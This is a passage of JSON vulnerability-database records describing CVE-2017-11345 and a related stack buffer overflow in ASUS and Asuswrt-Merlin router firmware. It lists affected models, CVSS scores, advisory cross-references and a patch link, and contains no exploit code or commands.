"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac3200",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt n12\\+ pro",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac58u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7485"
},
{
"model": "rt-ac55u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac66u b1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n300",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt ac1200g",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt ac1200gu",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt ac1900p",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt n12+ pro",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac1200",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac3100",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac3200",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac51u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac52u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac53",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac5300",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac55u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac56u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac58u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac66u b1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac68p",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12+",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12d1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n12hp",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n18u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n300",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n56u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n66u",
"scope": null,
"trust": 0.8,
"vendor": "asuswrt merlin",
"version": null
},
{
"model": "rt-n56u",
"scope": "eq",
"trust": 0.6,
"vendor": "asus",
"version": "1.0.1.4"
},
{
"model": "rt-ac5300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1900p",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac52u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac51u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n18u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3200",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1200gu",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac3100",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt ac1200g",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac1200",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac53",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12d1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12+",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt n12+ pro",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n16",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n300",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac55u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac56u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac58u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u b1",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac66u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac88u",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-ac68p",
"scope": null,
"trust": 0.6,
"vendor": "asus",
"version": null
},
{
"model": "rt-n12hp b1",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3479"
},
{
"model": "rt-n12d1",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n12\\+",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n12hp",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.2943"
},
{
"model": "rt-ac53",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9883"
},
{
"model": "rt ac1200gu",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.5577"
},
{
"model": "rt n12\\+ pro",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac1200",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-n16",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n300",
"scope": "eq",
"trust": 0.6,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-767"
},
{
"db": "NVD",
"id": "CVE-2017-11345"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200g_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1200gu_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_ac1900p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt_n12%2B_pro_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac1200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3100_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac3200_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac51u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac52u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac53_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac5300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac55u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac58u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_b1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac66u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac68u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-ac88u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12%2B_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12d1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_b1_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n12hp_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n16_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n18u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n300_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n56u_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:asuswrt-merlin_project:rt-n66u_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
}
]
},
"cve": "CVE-2017-11345",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CVE-2017-11345",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-35394",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "PARTIAL",
"baseScore": 6.8,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.6,
"id": "VHN-101758",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 1.8,
"id": "CVE-2017-11345",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2017-11345",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2017-11345",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-35394",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201707-767",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-101758",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"db": "VULHUB",
"id": "VHN-101758"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-767"
},
{
"db": "NVD",
"id": "CVE-2017-11345"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Stack buffer overflow in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code on the router by hosting a crafted device description XML document (that includes a serviceType element) at a URL specified within a Location header in an SSDP response. ASUSRT-AC5300 and others are wireless routers from ASUS. A networkmap is one of the network diagram components. A buffer overflow vulnerability exists in networkmaps in several ASUS products",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-11345"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"db": "VULHUB",
"id": "VHN-101758"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-11345",
"trust": 3.1
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2017/07/14/3",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005984",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201707-767",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-35394",
"trust": 0.6
},
{
"db": "SEEBUG",
"id": "SSVID-97016",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-101758",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"db": "VULHUB",
"id": "VHN-101758"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-767"
},
{
"db": "NVD",
"id": "CVE-2017-11345"
}
]
},
"id": "VAR-201707-0400",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"db": "VULHUB",
"id": "VHN-101758"
}
],
"trust": 1.342782942
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35394"
}
]
},
"last_update_date": "2025-04-20T23:36:49.545000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://asuswrt.lostrealm.ca/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-101758"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"db": "NVD",
"id": "CVE-2017-11345"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://www.openwall.com/lists/oss-security/2017/07/14/3"
},
{
"trust": 1.1,
"url": "https://asuswrt.lostrealm.ca/changelog"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-11345"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-11345"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"db": "VULHUB",
"id": "VHN-101758"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-767"
},
{
"db": "NVD",
"id": "CVE-2017-11345"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"db": "VULHUB",
"id": "VHN-101758"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"db": "CNNVD",
"id": "CNNVD-201707-767"
},
{
"db": "NVD",
"id": "CVE-2017-11345"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"date": "2017-07-17T00:00:00",
"db": "VULHUB",
"id": "VHN-101758"
},
{
"date": "2017-08-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"date": "2017-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-767"
},
{
"date": "2017-07-17T13:18:20.953000",
"db": "NVD",
"id": "CVE-2017-11345"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-11-29T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-35394"
},
{
"date": "2017-12-20T00:00:00",
"db": "VULHUB",
"id": "VHN-101758"
},
{
"date": "2017-08-14T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-005984"
},
{
"date": "2017-09-21T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201707-767"
},
{
"date": "2025-04-20T01:37:25.860000",
"db": "NVD",
"id": "CVE-2017-11345"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-767"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "plural ASUS For devices Asuswrt-Merlin Firmware and ASUS Firmware network map stack buffer overflow vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-005984"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201707-767"
}
],
"trust": 0.6
}
}
VAR-201707-0535
Vulnerability from variot - Updated: 2025-04-20 23:27Stack-based buffer overflow in ASUS_Discovery.c in networkmap in Asuswrt-Merlin firmware for ASUS devices and ASUS firmware for ASUS RT-AC5300, RT_AC1900P, RT-AC68U, RT-AC68P, RT-AC88U, RT-AC66U, RT-AC66U_B1, RT-AC58U, RT-AC56U, RT-AC55U, RT-AC52U, RT-AC51U, RT-N18U, RT-N66U, RT-N56U, RT-AC3200, RT-AC3100, RT_AC1200GU, RT_AC1200G, RT-AC1200, RT-AC53, RT-N12HP, RT-N12HP_B1, RT-N12D1, RT-N12+, RT_N12+_PRO, RT-N16, and RT-N300 devices allows remote attackers to execute arbitrary code via long device information that is mishandled during a strcat to a device list. ASUSRT-AC5300 is the RT series router product of ASUS. Asuswrt-Merlin is the firmware running in it. The following products are affected: ASUS RT-AC5300; RT_AC1900P; RT-AC68U; RT-AC68P; RT-AC88U; AC51U; RT-N18U; RT-N66U; RT-N56U; RT-AC3200; RT-AC3100; RT_AC1200GU; RT_AC1200G; RT_N12+_PRO; RT-N16; RT-N300
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201707-0535",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "rt-ac68u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n12\\+",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n56u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.378.7177"
},
{
"model": "rt-ac66u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac5300",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n18u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt ac1200g",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3167"
},
{
"model": "rt ac1900p",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac56u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n12hp",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.2943"
},
{
"model": "rt ac1200gu",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.5577"
},
{
"model": "rt-n12hp b1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.3479"
},
{
"model": "rt-ac51u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-n16",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac3100",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac1200",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac52u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.4180"
},
{
"model": "rt-ac68p",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-n66u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac53",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9883"
},
{
"model": "rt-n12d1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac88u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt-ac3200",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
"model": "rt n12\\+ pro",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.9880"
},
{
"model": "rt-ac58u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7485"
},
{
"model": "rt-ac55u",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7378"
},
{
"model": "rt-ac66u b1",
"scope": "lte",
"trust": 1.0,
"vendor": "asuswrt merlin",
"version": "3.0.0.4.380.7743"
},
{
